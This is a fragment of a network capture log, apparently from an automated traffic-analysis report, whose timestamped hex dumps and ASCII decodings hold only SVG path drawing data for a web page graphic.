                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7429INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7445INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7461INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                  Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7477INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                  Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7493INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7509INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                  Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7525INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7541INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7557INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                  Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7573INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7589INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                  Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7605INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7621INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                  Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7637INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7653INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                  Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7669INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:39 UTC7685INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                  Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
